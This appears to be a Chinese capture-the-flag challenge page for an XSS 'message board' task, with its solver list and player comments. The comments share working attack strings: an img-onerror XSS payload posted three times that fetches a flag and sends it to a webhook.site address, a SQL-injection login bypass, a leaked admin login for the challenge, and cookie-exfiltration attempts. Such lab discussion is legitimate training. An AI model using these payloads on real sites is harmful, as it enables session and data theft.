留言板WEB 未解决
分数:
10
金币:
3
题目作者:
harry
一 血:
꧁༺༽༾ཊ彪ཏ༿༼༻꧂
一血奖励:
5金币
解 决:
3386
提 示:
题目无需登录后台!需要xss平台接收flag
描 述:
http协议需要http协议的xss平台
评分(19)
解题动态
pigpigG6768 攻破了该题 1天前
ccxxxc 攻破了该题 1天前
panzhang 攻破了该题 1天前
gdrhdr 攻破了该题 2天前
杜沧笙 攻破了该题 5天前
下辈子一定学会 攻破了该题 5天前
hujunyi 攻破了该题 5天前
ykiko 攻破了该题 5天前
heart307 攻破了该题 6天前
wuyong5025 攻破了该题 8天前
mkolp 攻破了该题 9天前
ZzJia 攻破了该题 9天前
happy02 攻破了该题 9天前
Seika 攻破了该题 10天前
暗流安全 攻破了该题 10天前
comrade_kang 攻破了该题 10天前
我不是张先茂 攻破了该题 11天前
123321110 攻破了该题 11天前
15075683319 攻破了该题 12天前
评论
song..22 5天前
举报
<img src=x onerror="fetch('/flag').then(r=>r.text()).then(d=>fetch('http://webhook.site/59ef6d33-3e0e-4a78-82f8-f38d98eff154?flag='+encodeURIComponent(d)))">
song..22 5天前
举报
<img src=x onerror="fetch('/flag').then(r=>r.text()).then(d=>fetch('http://webhook.site/59ef6d33-3e0e-4a78-82f8-f38d98eff154?flag='+encodeURIComponent(d)))">
song..22 5天前
举报
<img src=x onerror="fetch('/flag').then(r=>r.text()).then(d=>fetch('http://webhook.site/59ef6d33-3e0e-4a78-82f8-f38d98eff154?flag='+encodeURIComponent(d)))">
Gcysnd 28天前
举报
挺容易,挖到admin后台/admin.php用1' or '1' = '1' --万能用户名登录后发现存在html注入点,于是聊天室发送<script>alert(cookie)</scirpt>找到flag
xxsko 23天前
举报
万能用户名你可以?我用你这个也不行1' or '1' = '1' --万能用户名
2333m 1月前
举报
触发xss需要登录后台/admin.php, admin/011be4d65feac1a8 (通过翻评论区找到的,据说是dirsearch跑出来admin.php和db.sql,但是我没找到)
YS_JW 1月前
举报
我在img图片位置直接插入http://{ceye平台}/?cookie='+document.cookie+',ceye那边有回显,但是cookie没有被带出来,直接以?cookie=\%27+document.cookie+\%27形式返回了,去掉'后也是直接以document.cookie字符返回,这是为啥哦,问ai也没问出来原因
BLX123 5月前
举报
想用python的h(ttp)协议来接收xss,自身得是一个公网IP反弹才能定位到自己
网恋秀牛子被录屏导致自卑 5月前
举报
ceye,xsspt,xss.aq要么收不到要么收费,我用的是xss.report,可以收到,payload很多,界面酷炫,点右边的爬虫图标就能看到详情,cookie里面有flag
igrazee 5月前
举报
flag{*******}
TTxyz 7月前
举报
啥题啊?不登陆怎么回显的???还有那个db.sql扫不出来啊,我直接访问也是无法连接???